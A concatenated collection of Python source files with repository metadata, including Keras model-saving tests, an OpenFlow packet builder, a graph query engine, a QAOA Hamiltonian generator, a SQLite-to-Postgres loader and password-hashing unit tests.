np.random.random((output_dim, output_dim)),
np.random.random((output_dim,))],
(None, 4, input_dim),
],
]
for layer, weights, input_shape in cases:
layer.build(input_shape)
_ = keras.engine.saving.preprocess_weights_for_loading(
layer, weights, original_keras_version='1')
model = keras.models.Sequential([keras.layers.Dense(2, input_dim=2)])
_ = keras.engine.saving.preprocess_weights_for_loading(
model, model.weights, original_keras_version='1')
x = keras.Input((2,))
y = keras.layers.Dense(2)(x)
model = keras.models.Model(x, y)
_ = keras.engine.saving.preprocess_weights_for_loading(
model, model.weights, original_keras_version='1')
def test_sequential_weight_loading(self):
if h5py is None:
return
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
num_hidden = 5
input_dim = 3
batch_size = 5
num_classes = 2
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, input_dim=input_dim))
model.add(keras.layers.Dense(num_classes))
x = np.random.random((batch_size, input_dim))
ref_y = model.predict(x)
model.save_weights(h5_path)
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, input_dim=input_dim))
model.add(keras.layers.Dense(num_classes))
model.load_weights(h5_path)
y = model.predict(x)
self.assertAllClose(y, ref_y)
class TestWholeModelSaving(test.TestCase):
def test_sequential_model_saving(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy],
sample_weight_mode='temporal')
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
new_model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# test that new updates are the same with both models
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
new_model.train_on_batch(x, y)
out = model.predict(x)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_sequential_model_saving_2(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.test_session():
# test with custom optimizer, loss
class CustomOp(keras.optimizers.RMSprop):
pass
def custom_loss(y_true, y_pred):
return keras.losses.mse(y_true, y_pred)
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss=custom_loss, optimizer=CustomOp(), metrics=['acc'])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(
fname,
custom_objects={'CustomOp': CustomOp,
'custom_loss': custom_loss})
os.close(fd)
os.remove(fname)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_functional_model_saving(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.test_session():
inputs = keras.layers.Input(shape=(3,))
x = keras.layers.Dense(2)(inputs)
output = keras.layers.Dense(3)(x)
model = keras.models.Model(inputs, output)
model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_saving_without_compilation(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
def test_saving_with_tf_optimizer(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse',
optimizer=training_module.AdadeltaOptimizer(0.1),
metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
def test_saving_right_after_compilation(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
model.model._make_train_function()
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
def test_saving_lambda_numpy_array_arguments(self):
if h5py is None:
return # Skip test if models cannot be saved.
mean = np.random.random((4, 2, 3))
std = np.abs(np.random.random((4, 2, 3))) + 1e-5
inputs = keras.layers.Input(shape=(4, 2, 3))
output = keras.layers.Lambda(lambda image, mu, std: (image - mu) / std,
arguments={'mu': mean, 'std': std})(inputs)
model = keras.models.Model(inputs, output)
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
self.assertAllClose(mean, model.layers[1].arguments['mu'])
self.assertAllClose(std, model.layers[1].arguments['std'])
def test_saving_model_with_long_layer_names(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.test_session():
# This layer name will make the `layers_name` HDF5 attribute blow
# out of proportion. Note that it fits into the internal HDF5
# attribute memory limit on its own but because h5py converts
# the list of layer names into numpy array, which uses the same
# amout of memory for every item, it increases the memory
# requirements substantially.
x = keras.Input(shape=(2,), name='input_' + ('x' * (2**15)))
f = x
for i in range(4):
f = keras.layers.Dense(2, name='dense_%d' % (i,))(f)
model = keras.Model(inputs=[x], outputs=[f])
model.compile(loss='mse', optimizer='adam', metrics=['acc'])
x = np.random.random((1, 2))
y = np.random.random((1, 2))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
# Check that the HDF5 files contains chunked array
# of layer names.
with h5py.File(fname, 'r') as h5file:
num_names_arrays = len([attr for attr in h5file['model_weights'].attrs
if attr.startswith('layer_names')])
# The chunking of layer names array should have happend.
self.assertGreater(num_names_arrays, 0)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Cleanup
os.close(fd)
os.remove(fname)
def test_saving_model_with_long_weights_names(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.test_session():
x = keras.Input(shape=(2,), name='nested_model_input')
f = x
for i in range(4):
f = keras.layers.Dense(2, name='nested_model_dense_%d' % (i,))(f)
# This layer name will make the `weights_name`
# HDF5 attribute blow out of proportion.
f = keras.layers.Dense(2, name='nested_model_output' + ('x' * (2**15)))(f)
nested_model = keras.Model(inputs=[x], outputs=[f], name='nested_model')
x = keras.Input(shape=(2,), name='outer_model_input')
f = nested_model(x)
f = keras.layers.Dense(2, name='outer_model_output')(f)
model = keras.Model(inputs=[x], outputs=[f])
model.compile(loss='mse', optimizer='adam', metrics=['acc'])
x = np.random.random((1, 2))
y = np.random.random((1, 2))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
# Check that the HDF5 files contains chunked array
# of weight names.
with h5py.File(fname, 'r') as h5file:
num_weight_arrays = len(
[attr for attr in h5file['model_weights']['nested_model'].attrs
if attr.startswith('weight_names')])
# The chunking of layer names array should have happend.
self.assertGreater(num_weight_arrays, 0)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Cleanup
os.close(fd)
os.remove(fname)
if __name__ == '__main__':
test.main()
| 34.510823
| 80
| 0.615341
|
4a18cecde3f358ddb42121c04e4f1fd488e78d13
| 604
|
py
|
Python
|
openFlow/ofptSetAsync.py
|
wsharif/thesis
|
96a9bd6c86ed027c3eeee231b2eae1c14394d728
|
[
"MIT"
] | null | null | null |
openFlow/ofptSetAsync.py
|
wsharif/thesis
|
96a9bd6c86ed027c3eeee231b2eae1c14394d728
|
[
"MIT"
] | null | null | null |
openFlow/ofptSetAsync.py
|
wsharif/thesis
|
96a9bd6c86ed027c3eeee231b2eae1c14394d728
|
[
"MIT"
] | null | null | null |
from ofptHeader import ofptHeader
from random import randint
from struct import Struct
def ofptSetAsync():
packetInMask = Struct('! I').pack(randint(0, 7))
packetInMask2 = Struct('! I').pack(randint(0, 7))
packetStatusMask = Struct('! I').pack(randint(0, 7))
packetStatusMask2 = Struct('! I').pack(randint(0, 7))
flowRemovedMask = Struct('! I').pack(randint(0, 15))
flowRemovedMask2 = Struct('! I').pack(randint(0, 15))
payload = packetInMask + packetInMask2 + packetStatusMask + packetStatusMask2 + flowRemovedMask + flowRemovedMask2
header = ofptHeader(28, payload)
return header + payload
| 35.529412
| 115
| 0.730132
|
4a18cf1e489b3c79d11c94ead62e276737f2f542
| 11,883
|
py
|
Python
|
curious/query.py
|
ginkgobioworks/curious
|
ee8a33a92640b95d477422d5d627c750920d976b
|
[
"MIT"
] | 10
|
2016-12-18T20:19:39.000Z
|
2020-09-05T02:49:38.000Z
|
curious/query.py
|
ginkgobioworks/curious
|
ee8a33a92640b95d477422d5d627c750920d976b
|
[
"MIT"
] | 5
|
2017-05-19T22:38:20.000Z
|
2018-04-04T15:16:07.000Z
|
curious/query.py
|
benjiec/curious
|
4e92c763f57ce9a61bd1a4b18203f9bb9b7bdaf6
|
[
"MIT"
] | 3
|
2015-08-12T03:01:50.000Z
|
2019-03-18T13:31:47.000Z
|
import time
from curious import model_registry
from curious.graph import traverse, mk_filter_function
from .parser import Parser
from .utils import report_time
class Query(object):
def __init__(self, query):
parser = Parser(query)
self.__query = query
self.__obj_query = parser.object_query
self.__steps = parser.steps
self.__validate()
@property
def query_string(self):
return self.__query
@staticmethod
def _validate(query):
"""
Validate a query. A query is an array whose elements are model
relationships or subqueries. This function checks each model relationship
to make sure the model and the relationship exist.
"""
for rel in query:
if 'orquery' in rel:
for q in rel['orquery']:
Query._validate(q)
elif 'subquery' in rel:
Query._validate(rel['subquery'])
else:
model = rel['model']
method = rel['method']
if method is None:
model_registry.get_manager(model).model_class
else:
model_registry.get_manager(model).getattr(method)
def __validate(self):
Query._validate([self.__obj_query]+self.__steps)
def __get_objects(self):
"""
Get initial objects from object query.
"""
model = self.__obj_query['model']
method = self.__obj_query['method']
filters = self.__obj_query['filters']
filter_f = mk_filter_function(filters)
if method is None:
cls = model_registry.get_manager(model).model_class
q = cls.objects.all()
q = filter_f(q)
return q
else:
f = model_registry.get_manager(model).getattr(method)
return f(filter_f)
@staticmethod
def _extend_result(obj_src, next_obj_src):
# build input hash of IDs
input_map = {}
for obj, src in obj_src:
if obj.pk not in input_map:
input_map[obj.pk] = []
input_map[obj.pk].append(src)
keep = []
for next_obj, next_src in next_obj_src:
if next_src in input_map:
for src in input_map[next_src]:
keep.append((next_obj, src))
return list(set(keep))
@staticmethod
@report_time
def _graph_step(obj_src, model, step_f, filters, tree=None):
"""
Traverse one step on the graph. Takes in and returns arrays of output,
input object tuples. The input objects in the tuples are from start of the
query, not start of this step.
"""
# check if type matches existing object type
if len(obj_src):
t = type(obj_src[0][0])
if hasattr(t, '_deferred') and t._deferred:
t = t.__base__
if t != model_registry.get_manager(model).model_class:
raise Exception('Type mismatch when executing query: expecting "%s", got "%s"' %
(model, type(obj_src[0][0])))
next_obj_src = traverse([obj for obj, src in obj_src], step_f, filters)
if tree is not None:
tree.extend((t[0].id, t[1]) for t in next_obj_src)
return Query._extend_result(obj_src, next_obj_src)
@staticmethod
def _recursive_rel(obj_src, step):
"""
Traverse a relationship recursively. Collected objects, either loop
terminating objects or loop continuing objects. Returns arrays of output,
input object tuples. The input objects in the tuples are from start of the
query, not start of this step.
"""
model = step['model']
method = step['method']
filters = step['filters']
collect = step['collect']
step_f = model_registry.get_manager(model).getattr(method)
collected = {}
tree = []
starting = True
if collect == 'search' and filters is None:
return obj_src
to_remove = []
if collect in ("all", "until", "search"):
# if traversal or search, then keep starting nodes if starting nodes pass filter
if filters in (None, {}, []):
for tup in obj_src:
collected[tup] = 1
else:
filter_f = mk_filter_function(filters)
if len(obj_src) > 0:
ids = [obj.id for obj, src in obj_src]
q = obj_src[0][0].__class__.objects.filter(id__in=ids)
q = filter_f(q)
matched_objs = {obj.pk: 1 for obj in q}
for tup in obj_src:
if tup[0].pk in matched_objs:
collected[tup] = 1
elif collect == 'until':
# cannot continue to search with this starting node
to_remove.append(tup)
if len(to_remove) > 0:
obj_src = [tup for tup in obj_src if tup not in to_remove]
visited = {}
while len(obj_src) > 0:
# prevent loops by removing previously encountered edges; because many
# edges can lead to the same object, preventing revisit of edges rather
# than objects avoids loops without missing out on an edge.
new_src = [tup for tup in obj_src if tup not in visited]
for tup in obj_src:
visited[tup] = 1
if len(new_src) == 0:
break
next_obj_src = Query._graph_step(new_src, model, step_f, filters, tree)
# print "from %s\nreach %s" % (new_src, next_obj_src)
if collect == 'terminal':
next_demux = Query._graph_step([(obj, obj.pk) for obj, src in obj_src], model, step_f, filters)
next_src = [t[1] for t in next_demux]
for tup in obj_src:
if tup[0].pk not in next_src:
if tup not in collected:
collected[tup] = 1
obj_src = next_obj_src
elif collect == 'search':
reachable = Query._graph_step(obj_src, model, step_f, None)
for tup in next_obj_src:
if tup not in collected:
collected[tup] = 1
obj_src = list(set(reachable)-set(next_obj_src))
elif collect == 'until':
for tup in next_obj_src:
if tup not in collected:
collected[tup] = 1
obj_src = next_obj_src
else: # traversal
reachable = Query._graph_step(obj_src, model, step_f, None)
for tup in next_obj_src:
if tup not in collected:
collected[tup] = 1
obj_src = reachable
return collected.keys(), tree
@staticmethod
def _rel_step(obj_src, step):
"""
Traverse a relationship, possibly recursively. Takes in and returns arrays
of output, input object tuples. The input objects in the tuples are from
start of the query, not start of this step.
"""
tree = None
if 'recursive' not in step or step['recursive'] is False:
model = step['model']
method = step['method']
filters = step['filters']
step_f = model_registry.get_manager(model).getattr(method)
obj_src = Query._graph_step(obj_src, model, step_f, filters)
else:
obj_src, tree = Query._recursive_rel(obj_src, step)
# print '%s: %d' % (step, len(obj_src))
return obj_src, tree
@staticmethod
def _filter_by_subquery(obj_src, step):
"""
Filters existing objects by the subquery.
"""
subquery = step['subquery']
having = step['having']
#print 'sub %s, having %s' % (subquery, having)
objects = [obj for obj, src in obj_src]
subquery_res, last_model = Query._query(objects, subquery)
#print 'res %s' % (subquery_res,)
# take only the last result from subquery; grammar should enforce this.
if len(subquery_res) > 0:
assert(len(subquery_res) == 1)
subquery_res = subquery_res[-1][0]
subq_res_map = {}
for sub_obj, sub_src in subquery_res:
if sub_src not in subq_res_map:
subq_res_map[sub_src] = []
subq_res_map[sub_src].append(sub_obj)
keep = []
for obj, src in obj_src:
result_from_subq = []
if obj.pk in subq_res_map:
result_from_subq = subq_res_map[obj.pk]
if len(result_from_subq) > 0: # subquery has result
# if no modifier to subquery, or said should have subquery results ('+' or '?')
if having is None or having in ('+', '?'):
keep.append((obj, src))
if len(result_from_subq) == 0: # no subquery result
# if said should not have subquery results ('-') or don't care ('?')
if having in ('-', '?'):
keep.append((obj, src))
if having == '?':
subquery_res.append((None, obj.pk))
return keep, subquery_res
@staticmethod
def _or(obj_src, step):
"""
Or results of multiple queries
"""
or_queries = step['orquery']
or_results = []
for query in or_queries:
objects = [obj for obj, src in obj_src]
res, m = Query._query(objects, query)
if len(res) > 0 and len(res[0][0]):
or_results.append((res, m))
models = list(set([r[1] for r in or_results]))
if len(models) > 1:
raise Exception("Different object types at end of OR query: %s" % (', '.join([str(x) for x in models]),))
next_obj_src = []
for res, m in or_results:
next_obj_src.extend(res[0][0])
return Query._extend_result(obj_src, next_obj_src)
@staticmethod
def _query(objects, query, demux_first=True):
"""
Executes a query. A query consists of one or more subqueries. Each subquery
is an array of model relationships. In most cases the outputs of a subquery
becomes the inputs to the next query.
Input objects should be an array of model instances. Returns an array of
subquery results. Each subquery result is an array of tuples. First member
of tuple is output object from query. Second member of tuple is the pk of
the input object that produced the output.
"""
res = []
more_results = True
last_non_sub_index = -1
last_tree = None
if demux_first is True:
obj_src = [(obj, obj.pk) for obj in objects]
else:
obj_src = [(obj, None) for obj in objects]
for step in query:
if ('join' in step and step['join'] is True) or\
('subquery' in step and (step['having'] is None or step['having'] == '?')):
if more_results:
res.append((obj_src, last_non_sub_index, last_tree))
last_non_sub_index = len(res)-1
more_results = False
obj_src = list(set([(obj, obj.pk) for obj, src in obj_src]))
if 'orquery' in step:
#print 'orquery %s' % step
obj_src = Query._or(obj_src, step)
#print 'completed orquery'
more_results = True
elif 'subquery' in step:
#print 'subquery %s' % step
obj_src, subquery_res = Query._filter_by_subquery(obj_src, step)
#print 'completed subquery'
if step['having'] is None or step['having'] == '?':
# add subquery result to results, even if there are no results from subquery
res.append((subquery_res, last_non_sub_index, last_tree))
# don't increase last_non_sub_index, so caller knows next query
# should still join with the last non sub query results.
more_results = False
else:
#print 'query: %s' % step
obj_src, last_tree = Query._rel_step(obj_src, step)
#print 'completed query'
more_results = True
if more_results:
res.append((obj_src, last_non_sub_index, last_tree))
# last model, can be None if left join and got no data
t = None
for obj, src in obj_src:
if obj is not None:
t = obj.__class__
if hasattr(t, '_deferred') and t._deferred:
t = t.__base__
break
return res, t
def __call__(self):
"""
Executes the current query. Returns array of tuples; first member of tuple
is output object from query, second member of tuple is the object from the
first step of the query that produced the output object. Also returns
current model at end of query, which may be different than model of the
last result if last result is a filter query.
"""
objects = list(self.__get_objects())
return Query._query(objects, self.__steps, demux_first=False)
| 30.864935
| 111
| 0.629723
|
4a18cff823d4c94030df536ee5a995795359c31a
| 1,886
|
py
|
Python
|
src/python/zquantum/qaoa/problems/generators.py
|
zapatacomputing/z-quantum-qaoa
|
a13a99939ee41c760fdfb302e5f4944e087a09a7
|
[
"Apache-2.0"
] | 3
|
2020-10-06T13:54:40.000Z
|
2021-07-04T21:02:14.000Z
|
src/python/zquantum/qaoa/problems/generators.py
|
zapatacomputing/z-quantum-qaoa
|
a13a99939ee41c760fdfb302e5f4944e087a09a7
|
[
"Apache-2.0"
] | 34
|
2020-04-30T02:52:31.000Z
|
2022-03-30T19:19:14.000Z
|
src/python/zquantum/qaoa/problems/generators.py
|
zapatacomputing/z-quantum-qaoa
|
a13a99939ee41c760fdfb302e5f4944e087a09a7
|
[
"Apache-2.0"
] | 5
|
2020-06-24T10:57:01.000Z
|
2021-07-09T01:14:16.000Z
|
from typing import Callable, Dict, List
import networkx as nx
import numpy as np
from openfermion import QubitOperator
from zquantum.core.graph import generate_graph_from_specs
def get_random_hamiltonians_for_problem(
graph_specs: Dict,
number_of_instances: int,
possible_number_of_qubits: List[int],
hamiltonian_generator: Callable[[nx.Graph], QubitOperator],
seed=None,
) -> List[QubitOperator]:
"""Generates Hamiltonians based on the input graph description for a range
of number of qubits and a set number of instances.
Args:
graph_specs: Specifications of the graph to generate. It should contain at
least an entry with key 'type_graph' (Note: 'num_nodes' key will be overwritten)
number_of_instances: The number of hamiltonians to generate
possible_number_of_qubits: A list containing the number of
qubits in the hamiltonian. If it contains more than one value, then a
random value from the list will be picked to generate each instance.
hamiltonian_generator: a function that will generate a Hamiltonian
for a given problem based on the input graph.
seed: seed for random number generator
Returns:
List of openfermion.QubitOperator object describing the
Hamiltonians
H = \\sum_{<i,j>} w_{i,j} * scaling * (Z_i Z_j - shifted * I).
"""
if seed is not None:
np.random.seed(seed)
if "type_graph" not in graph_specs.keys():
raise ValueError("graph_specs should contain type_graph field.")
hamiltonians = []
for _ in range(number_of_instances):
graph_specs["num_nodes"] = np.random.choice(possible_number_of_qubits)
graph = generate_graph_from_specs(graph_specs)
hamiltonian = hamiltonian_generator(graph)
hamiltonians.append(hamiltonian)
return hamiltonians
| 40.12766
| 92
| 0.712619
|
4a18d01ea6cd6818c1a98878ba6e84750e2c5f0f
| 1,099
|
py
|
Python
|
services/movies_admin/utils/sqlite_to_postgres/load_data.py
|
svvladimir-ru/ugc_sprint_1
|
7ae4f9094f34981057f6c80d38bd96df6c96d2db
|
[
"MIT"
] | null | null | null |
services/movies_admin/utils/sqlite_to_postgres/load_data.py
|
svvladimir-ru/ugc_sprint_1
|
7ae4f9094f34981057f6c80d38bd96df6c96d2db
|
[
"MIT"
] | null | null | null |
services/movies_admin/utils/sqlite_to_postgres/load_data.py
|
svvladimir-ru/ugc_sprint_1
|
7ae4f9094f34981057f6c80d38bd96df6c96d2db
|
[
"MIT"
] | 1
|
2021-09-30T09:49:40.000Z
|
2021-09-30T09:49:40.000Z
|
import os
import sqlite3
from pathlib import Path
import psycopg2
from psycopg2.extensions import connection as _connection
from utils.loader import SQLiteLoader
from utils.saver import PostgresSaver
def load_from_sqlite(connection: sqlite3.Connection, pg_conn: _connection):
"""Basic method for loading data from SQLite into Postgres."""
postgres_saver = PostgresSaver(pg_conn)
sqlite_loader = SQLiteLoader(connection)
postgres_saver.save_all_data(sqlite_loader.load_movies())
if __name__ == '__main__':
dsl = {
'dbname': os.environ.get('POSTGRES_NAME', 'movies'),
'user': os.environ.get('POSTGRES_USER', 'postgres'),
'host': os.environ.get('POSTGRES_HOST', 'localhost'),
'port': os.environ.get('POSTGRES_PORT', '5432'),
'password': os.environ.get('POSTGRES_PASSWORD', 'postgres'),
}
sqlite_path = Path(__file__).parent.joinpath('db.sqlite')
with sqlite3.connect(sqlite_path) as sqlite_conn, psycopg2.connect(**dsl) as pg_conn:
load_from_sqlite(sqlite_conn, pg_conn)
sqlite_conn.close()
pg_conn.close()
| 33.30303
| 89
| 0.719745
|
4a18d0f336d21256fb7c4e51ecd092c67467c038
| 297
|
py
|
Python
|
easy/28. Implement strStr().py
|
junyinglucn/leetcode
|
1fbd0962e4b7dc46b4ed4f0f86778cfedbda72e7
|
[
"MIT"
] | null | null | null |
easy/28. Implement strStr().py
|
junyinglucn/leetcode
|
1fbd0962e4b7dc46b4ed4f0f86778cfedbda72e7
|
[
"MIT"
] | null | null | null |
easy/28. Implement strStr().py
|
junyinglucn/leetcode
|
1fbd0962e4b7dc46b4ed4f0f86778cfedbda72e7
|
[
"MIT"
] | null | null | null |
class Solution:
def strStr(self, haystack: str, needle: str) -> int:
l = len(needle)
if l == 0:
return 0
i = 0
while i <= (len(haystack) - l):
if haystack[i:i + l] == needle:
return i
i += 1
return -1
| 24.75
| 56
| 0.420875
|
4a18d10a58f0e03779cf33de960ad76e8c8fde7d
| 333
|
py
|
Python
|
rest_registration/api/views/__init__.py
|
gcbirzan/django-rest-registration
|
1a9da937c283d03d1fce1a68322a702e14692c79
|
[
"MIT"
] | 329
|
2018-05-09T13:10:37.000Z
|
2022-03-25T11:05:20.000Z
|
rest_registration/api/views/__init__.py
|
gcbirzan/django-rest-registration
|
1a9da937c283d03d1fce1a68322a702e14692c79
|
[
"MIT"
] | 167
|
2018-04-21T00:28:17.000Z
|
2022-03-30T09:24:52.000Z
|
rest_registration/api/views/__init__.py
|
gcbirzan/django-rest-registration
|
1a9da937c283d03d1fce1a68322a702e14692c79
|
[
"MIT"
] | 97
|
2018-05-09T14:17:59.000Z
|
2022-02-23T08:46:30.000Z
|
from .change_password import change_password # noqa
from .login import login, logout # noqa
from .profile import profile # noqa
from .register import register, verify_registration # noqa
from .register_email import register_email, verify_email # noqa
from .reset_password import reset_password, send_reset_password_link # noqa
| 47.571429
| 76
| 0.813814
|
4a18d31811e8bfbbb7f6e21c58fd09ed1536601f
| 6,253
|
py
|
Python
|
utils_test.py
|
ockibagusp/cek-password
|
f7f38c5bcd518913cfe9ce6b5fcf7359e7b9e559
|
[
"MIT"
] | null | null | null |
utils_test.py
|
ockibagusp/cek-password
|
f7f38c5bcd518913cfe9ce6b5fcf7359e7b9e559
|
[
"MIT"
] | null | null | null |
utils_test.py
|
ockibagusp/cek-password
|
f7f38c5bcd518913cfe9ce6b5fcf7359e7b9e559
|
[
"MIT"
] | null | null | null |
#!/bin/python
# -*- coding: utf-8 -*-
"""
Ocki Bagus Pratama © 2021
"""
import json
import unittest
from utils import check_password
from sys import version_info
class TestUtils(unittest.TestCase):
def test_random_password(self):
# Lists of normal case scenarios.
list_test = [
# ("Case", "Output auto")
("Test1", "%nln@rF3NZAz@B2p"), # auto: 16 character
("Test2", "A2zmuJ%Cyy0VxjPb2L"), # auto: 18 character
("Test3", "zQKPzcVuQu#3esuSYtCzrG40"), # auto: 24 character
# incorrect
("Test4", "Max. 128 character") # auto: >128 character
]
for (testcase, inout) in list_test:
if testcase == "Test1":
out = "%nln@rF3NZAz@B2p"
elif testcase == "Test2":
out = "A2zmuJ%Cyy0VxjPb2L"
elif testcase == "Test3":
out = "zQKPzcVuQu#3esuSYtCzrG40"
elif testcase == "Test4":
out = "Max. 128 character"
self.assertEqual(inout, out)
def test_replace_password(self):
# replace password: 'a' -> '@', 'B' -> '&'...
_replaces = '{"a": "@","B": "&","b": "&","C": "<","c": "<","D": "|)","K": "|<","k": "|<","S": "$","s": "$","X": "%","x": "%"," ": "."}'
data = json.loads(_replaces)
print(data)
# Lists of normal case scenarios.
list_test = [
# ("Case", "Output")
("Test1|ThisIsPassword1", "Thi$I$P@$$word1"),
("Test2|ThisIsDolphin2", "Thi$I$|)olphin2"),
("Test3|ThisIsCow3", "Thi$I$<ow3"),
("Test4|ThisIsSpider4", "Thi$I$$pider4"),
]
# incorrect
for (tc, inout) in list_test:
testcase = str.split(tc, "|")
s = testcase[1]
for key, replace in data.items():
s = s.replace(key, replace)
self.assertEqual(s, inout)
def test_hasher(self):
# Lists of normal case scenarios.
list_test = [
# ("Case|Hasher function", "Input|Output")
("Test1|md5", "ThisIsTest1|1fb81916b94ae73ddd71ac6fcf5a6e01"),
("Test2|sha1", "ThisIsTest2|55b3eeebf68f7a2895993d8a616b00654bf13217"),
("Test3|sha224", "ThisIsTest3|2856b277aee63cb9bc9a63ee66adf269c1efdfa5b7cd3b5f2fbb8afa"),
("Test4|sha256", "ThisIsTest4|f9964fc0c93157234071446069c72b0d571918f6d737f30054adc7ba516db380"),
("Test5|sha384", "ThisIsTest5|202bd0a7541a1e2309d45a26f8488fdef1c00dd6ffabd30bee6aba58fe06ef309e85df881c78e54c544302e24a229859"),
("Test6|sha512", "ThisIsTest6|12ae4fff4a0d152b26acf43872519220d2f32d61c9133616f4f2a2310556bbe4739eb558f3db36242208dcc62bef00b2c31b655f469b51c5775533a36f58be5e"),
("Test7|No", "|Ocki Bagus Pratama © 2020"),
# incorrect
("Test8|asfff", "|Wrong!")
]
# Python 3.6 or later
if version_info >= (3, 6):
list_test.append(("Test9|blake2b", "ThisIsTest7|68f750d29e6fb2492b9ded9ae7f2bfc2a24bbc3f2952a69856be4177ae11bd42d55a126eb3ed3a6f89eb05280f52f50b3cb71ae7064cdcc5cf41f624d15ec9a3"))
list_test.append(("Test10|blake2s", "ThisIsTest8|db81752111c5b1d8ea8c85f032984dffcdb756d5b6d51ac21a4592a2eea9bfeb"))
pas = check_password()
for (k, v) in list_test:
testcase = str.split(k, "|")
inout = str.split(v, "|")
pas.action(inout[0])
if testcase[1] == "md5":
out = pas.md5()
elif testcase[1] == "sha1":
out = pas.sha1()
elif testcase[1] == "sha224":
out = pas.sha224()
elif testcase[1] == "sha256":
out = pas.sha256()
elif testcase[1] == "sha384":
out = pas.sha384()
elif testcase[1] == "sha512":
out = pas.sha512()
elif testcase[1] == "blake2b":
out = pas.blake2b()
elif testcase[1] == "blake2s":
out = pas.blake2s()
elif testcase[1] == "No":
out = "Ocki Bagus Pratama © 2020"
elif testcase[1] == "asfff":
out = "Wrong!"
self.assertEqual(inout[1], out)
def test_hex(self):
# Lists of normal case scenarios.
list_test = [
# ("Case|Hasher function", "Output|10 digest")
("Test1|md5", "e1b849f9631ffc1829b2e31402373e3c|1402373e3c"),
("Test2|sha1", "2b84f621c0fd4ba8bd514c5c43ab9a897c8c014e|897c8c014e"),
("Test3|sha224", "5e10e8b7142ca791d7e2c94c6cdb5068a5b7b36513c684588763ca34|588763ca34"),
("Test4|sha256", "b9cca56a720f2beee61f2e744ab3d20a95772a4315d18c5eee251a465f078012|465f078012"),
("Test5|sha384", "4d5c1ff38f0c3882e91b31962285f803024e9cee8940aa9a1b5936d800058a59221fd31aa9c9d638fd14b28ccecaa78c|8ccecaa78c"),
("Test6|sha512", "9ad960eb301b9efd416686821761232e3acaaec24afa7e6e29913990f8e7090f9c74ca4d18a211632a81ac1d92116f26538e655152356972f137ab6229960998|6229960998"),
("Test7|blake2b", "04ed9de6f876fdee30be2d19304b32550f9943b750a7e3c2d40cda9b9a287cf7c2ec15ae31d029518deab1f4b9dd78da9e7a7add05e20eb5e909943d2e0b4937|3d2e0b4937"),
("Test8|blake2s", "6658043aeb25afe1199b61f1880af58d2eae9211bb94390f72069d5d6ec07181|5d6ec07181"),
]
pas = check_password()
for (k, v) in list_test:
testcase = str.split(k, "|")
inout = str.split(v, "|")
pas.action(inout[0])
hex = pas.hex(inout[0], 10)
if testcase[1] == "md5":
out = hex
elif testcase[1] == "sha1":
out = hex
elif testcase[1] == "sha224":
out = hex
elif testcase[1] == "sha256":
out = hex
elif testcase[1] == "sha384":
out = hex
elif testcase[1] == "sha512":
out = hex
elif testcase[1] == "blake2b":
